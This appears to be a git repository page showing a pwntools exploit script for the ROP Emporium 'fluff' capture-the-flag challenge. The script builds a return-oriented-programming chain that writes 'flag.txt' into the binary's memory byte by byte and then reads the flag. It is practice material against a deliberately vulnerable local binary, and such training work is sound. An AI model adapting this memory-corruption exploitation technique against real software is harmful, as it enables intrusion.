406768c5fe
modified: x86_64/fluff/.gdb_history deleted: x86_64/fluff/core modified: x86_64/fluff/exploit.py deleted: x86_64/ret2win/core deleted: x86_64/split/core deleted: x86_64/write4/core
48 lines
1.2 KiB
Python
Executable File
48 lines
1.2 KiB
Python
Executable File
#!/usr/bin/env python3
|
|
from pwn import *
|
|
|
|
letter_lookups = {
|
|
'f' : 0x00000000004003c4,
|
|
'l' : 0x0000000000400239,
|
|
'a' : 0x00000000004003d6,
|
|
'g' : 0x00000000004003cf,
|
|
'.' : 0x0000000000400251,
|
|
't' : 0x0000000000400192,
|
|
'x' : 0x0000000000400246}
|
|
|
|
def write_str(dest, string, payload):
|
|
payload += p64(0x00000000004006a3)
|
|
payload += p64(dest)
|
|
payload += p64(0x0000000000400610)
|
|
payload += p64(1)
|
|
payload += p64(0x40062a)
|
|
payload += p64(0x4000)
|
|
payload += p64(letter_lookups[string[0]] - 0x3ef2)
|
|
payload += p64(0x400628)
|
|
payload += p64(0x400639)
|
|
|
|
|
|
for c in string[1:]:
|
|
payload += p64(0x40062b)
|
|
payload += p64(letter_lookups[c] - 0x3ef2)
|
|
payload += p64(0x0000000000400610)
|
|
payload += p64(1)
|
|
payload += p64(0x400628)
|
|
payload += p64(0x400639)
|
|
|
|
return(payload)
|
|
|
|
|
|
prog = process('./fluff')
|
|
payload = b''
|
|
for c in range(40):
|
|
payload += b'a'
|
|
|
|
payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
|
|
payload += p64(0x00000000004006a3)
|
|
payload += p64(0x601be0)
|
|
payload += p64(0x0000000000400510)
|
|
|
|
prog.sendline(payload)
|
|
prog.interactive()
|